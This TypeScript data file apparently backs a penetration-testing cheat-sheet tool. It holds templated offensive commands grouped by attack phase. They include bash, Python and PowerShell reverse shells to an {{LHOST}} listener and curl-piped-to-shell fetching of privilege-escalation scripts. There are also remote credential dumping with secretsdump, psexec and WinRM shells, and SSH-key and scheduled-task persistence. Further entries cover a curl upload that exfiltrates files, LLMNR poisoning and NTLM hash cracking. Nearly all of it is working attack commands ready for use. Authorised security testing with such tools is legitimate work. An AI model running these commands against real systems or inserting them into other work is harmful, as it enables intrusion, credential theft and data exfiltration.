export type Command = {
  id: string;
  title: string;
  template: string;
  description: string;
  categories: string[];
  os: string[];
  tags: string[];
};

export const CATEGORIES = [
  "Recon",
  "Enumeration",
  "Exploitation",
  "Post-Exploitation",
  "Privilege Escalation",
  "Persistence",
  "Lateral Movement",
  "Credential Access",
  "Exfiltration",
  "Web",
  "Network",
];

export const OS_TAGS = ["Linux", "Windows", "macOS", "Any"];

export const TAG_LIST = [
  "nmap",
  "smb",
  "ldap",
  "kerberos",
  "http",
  "dns",
  "powershell",
  "bash",
  "python",
  "sql",
];

export const COMMANDS: Command[] = [
  {
    id: "nmap-full",
    title: "Nmap full TCP scan",
    template: "nmap -sC -sV -p- -T4 {{TARGET_IP}} -oN nmap_{{TARGET_IP}}.txt",
    description: "Aggressive full-port TCP scan with default scripts and version detection.",
    categories: ["Recon", "Network"],
    os: ["Any"],
    tags: ["nmap"],
  },
  {
    id: "nmap-udp",
    title: "Nmap top UDP ports",
    template: "sudo nmap -sU --top-ports 50 {{TARGET_IP}}",
    description: "Fast UDP scan against the top 50 ports.",
    categories: ["Recon", "Network"],
    os: ["Any"],
    tags: ["nmap"],
  },
  {
    id: "ffuf-dir",
    title: "ffuf directory fuzz",
    template: "ffuf -u http://{{TARGET_HOST}}/FUZZ -w {{WORDLIST}} -mc 200,204,301,302,307,401,403",
    description: "Directory and file discovery against a web root.",
    categories: ["Web", "Enumeration"],
    os: ["Any"],
    tags: ["http"],
  },
  {
    id: "ffuf-vhost",
    title: "ffuf vhost fuzz",
    template: "ffuf -u http://{{TARGET_HOST}}/ -H 'Host: FUZZ.{{DOMAIN}}' -w {{WORDLIST}} -fs {{FILTER_SIZE}}",
    description: "Discover virtual hosts by fuzzing the Host header.",
    categories: ["Web", "Enumeration"],
    os: ["Any"],
    tags: ["http", "dns"],
  },
  {
    id: "smbclient-list",
    title: "smbclient list shares",
    template: "smbclient -L //{{TARGET_IP}} -U '{{USERNAME}}%{{PASSWORD}}'",
    description: "Enumerate SMB shares on the target with supplied credentials.",
    categories: ["Enumeration"],
    os: ["Linux"],
    tags: ["smb"],
  },
  {
    id: "crackmapexec-smb",
    title: "CME SMB spray",
    template: "crackmapexec smb {{TARGET_IP}} -u {{USERNAME}} -p {{PASSWORD}} --shares",
    description: "Authenticate to SMB and list accessible shares.",
    categories: ["Credential Access", "Enumeration"],
    os: ["Linux"],
    tags: ["smb"],
  },
  {
    id: "kerbrute-users",
    title: "Kerbrute user enum",
    template: "kerbrute userenum -d {{DOMAIN}} --dc {{TARGET_IP}} {{WORDLIST}}",
    description: "Enumerate valid domain users via Kerberos pre-auth.",
    categories: ["Enumeration", "Credential Access"],
    os: ["Any"],
    tags: ["kerberos", "ldap"],
  },
  {
    id: "ldapsearch-anon",
    title: "LDAP anonymous bind",
    template: "ldapsearch -x -H ldap://{{TARGET_IP}} -b 'DC={{DC1}},DC={{DC2}}'",
    description: "Attempt anonymous LDAP bind and dump the base DN.",
    categories: ["Enumeration"],
    os: ["Any"],
    tags: ["ldap"],
  },
  {
    id: "impacket-secretsdump",
    title: "Impacket secretsdump",
    template: "impacket-secretsdump {{DOMAIN}}/{{USERNAME}}:{{PASSWORD}}@{{TARGET_IP}}",
    description: "Dump SAM, LSA and NTDS secrets from a remote host.",
    categories: ["Credential Access", "Post-Exploitation"],
    os: ["Linux"],
    tags: ["smb"],
  },
  {
    id: "psexec",
    title: "Impacket psexec",
    template: "impacket-psexec {{DOMAIN}}/{{USERNAME}}:{{PASSWORD}}@{{TARGET_IP}}",
    description: "Get an interactive SYSTEM shell via SMB.",
    categories: ["Lateral Movement", "Exploitation"],
    os: ["Linux"],
    tags: ["smb"],
  },
  {
    id: "evilwinrm",
    title: "Evil-WinRM login",
    template: "evil-winrm -i {{TARGET_IP}} -u {{USERNAME}} -p {{PASSWORD}}",
    description: "Interactive WinRM shell against a Windows target.",
    categories: ["Lateral Movement"],
    os: ["Linux", "Windows"],
    tags: ["powershell"],
  },
  {
    id: "revshell-bash",
    title: "Bash reverse shell",
    template: "bash -c 'bash -i >& /dev/tcp/{{LHOST}}/{{LPORT}} 0>&1'",
    description: "Classic bash TCP reverse shell one-liner.",
    categories: ["Exploitation", "Post-Exploitation"],
    os: ["Linux"],
    tags: ["bash"],
  },
  {
    id: "revshell-py",
    title: "Python reverse shell",
    template: "python3 -c 'import os,pty,socket;s=socket.socket();s.connect((\"{{LHOST}}\",{{LPORT}}));[os.dup2(s.fileno(),f) for f in (0,1,2)];pty.spawn(\"/bin/bash\")'",
    description: "Python one-liner reverse shell with PTY upgrade.",
    categories: ["Exploitation"],
    os: ["Linux"],
    tags: ["python", "bash"],
  },
  {
    id: "revshell-ps",
    title: "PowerShell reverse shell",
    template: "powershell -nop -c \"$c=New-Object Net.Sockets.TCPClient('{{LHOST}}',{{LPORT}});$s=$c.GetStream();[byte[]]$b=0..65535|%{0};while(($i=$s.Read($b,0,$b.Length)) -ne 0){$d=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0,$i);$o=(iex $d 2>&1|Out-String);$r=$o+'PS '+(pwd).Path+'> ';$b2=([text.encoding]::ASCII).GetBytes($r);$s.Write($b2,0,$b2.Length);$s.Flush()}\"",
    description: "Windows-friendly PowerShell reverse shell.",
    categories: ["Exploitation"],
    os: ["Windows"],
    tags: ["powershell"],
  },
  {
    id: "linpeas",
    title: "Fetch and run linpeas",
    template: "curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh",
    description: "Download and run linpeas for Linux privesc enumeration.",
    categories: ["Privilege Escalation", "Enumeration"],
    os: ["Linux"],
    tags: ["bash"],
  },
  {
    id: "winpeas",
    title: "Run winPEAS",
    template: "iwr -Uri https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASx64.exe -OutFile winpeas.exe; .\\winpeas.exe",
    description: "Download and execute winPEAS on Windows.",
    categories: ["Privilege Escalation", "Enumeration"],
    os: ["Windows"],
    tags: ["powershell"],
  },
  {
    id: "sudo-l",
    title: "Sudo enumeration",
    template: "sudo -l",
    description: "List sudo rules for the current user.",
    categories: ["Privilege Escalation"],
    os: ["Linux"],
    tags: ["bash"],
  },
  {
    id: "ssh-persistence",
    title: "SSH key persistence",
    template: "mkdir -p ~/.ssh && echo '{{PUBKEY}}' >> ~/.ssh/authorized_keys && chmod 600 ~/.ssh/authorized_keys",
    description: "Drop a public key for persistent SSH access.",
    categories: ["Persistence"],
    os: ["Linux"],
    tags: ["bash"],
  },
  {
    id: "scheduled-task",
    title: "Scheduled task persistence",
    template: "schtasks /Create /SC ONLOGON /TN Updater /TR \"{{PAYLOAD_PATH}}\" /RL HIGHEST",
    description: "Create a logon-triggered scheduled task on Windows.",
    categories: ["Persistence"],
    os: ["Windows"],
    tags: ["powershell"],
  },
  {
    id: "sqlmap-basic",
    title: "sqlmap basic",
    template: "sqlmap -u 'http://{{TARGET_HOST}}/page?id=1' --batch --dbs",
    description: "Enumerate databases via SQL injection.",
    categories: ["Web", "Exploitation"],
    os: ["Any"],
    tags: ["sql", "http"],
  },
  {
    id: "curl-download",
    title: "Curl file exfil",
    template: "curl -T {{FILE}} http://{{LHOST}}:{{LPORT}}/",
    description: "Upload a file to a listening HTTP server.",
    categories: ["Exfiltration"],
    os: ["Any"],
    tags: ["http", "bash"],
  },
  {
    id: "http-server",
    title: "Python HTTP server",
    template: "python3 -m http.server {{LPORT}}",
    description: "Serve the current directory over HTTP.",
    categories: ["Network"],
    os: ["Any"],
    tags: ["python", "http"],
  },
  {
    id: "nc-listener",
    title: "Netcat listener",
    template: "nc -lvnp {{LPORT}}",
    description: "Listen for an incoming reverse shell.",
    categories: ["Network"],
    os: ["Any"],
    tags: ["bash"],
  },
  {
    id: "dig-axfr",
    title: "DNS zone transfer",
    template: "dig axfr @{{TARGET_IP}} {{DOMAIN}}",
    description: "Attempt a DNS zone transfer against a nameserver.",
    categories: ["Recon", "Enumeration"],
    os: ["Any"],
    tags: ["dns"],
  },
  {
    id: "hashcat-ntlm",
    title: "Hashcat NTLM",
    template: "hashcat -m 1000 -a 0 {{HASH_FILE}} {{WORDLIST}} -r /usr/share/hashcat/rules/best64.rule",
    description: "Crack NTLM hashes with a wordlist and rules.",
    categories: ["Credential Access"],
    os: ["Any"],
    tags: [],
  },
  {
    id: "responder",
    title: "Responder LLMNR poisoning",
    template: "sudo responder -I {{INTERFACE}} -wd",
    description: "Poison LLMNR/NBT-NS and capture NetNTLM hashes.",
    categories: ["Credential Access", "Network"],
    os: ["Linux"],
    tags: [],
  },
];

export const PARAM_KEYS = [
  "TARGET_IP",
  "TARGET_HOST",
  "DOMAIN",
  "USERNAME",
  "PASSWORD",
  "LHOST",
  "LPORT",
  "WORDLIST",
  "INTERFACE",
];
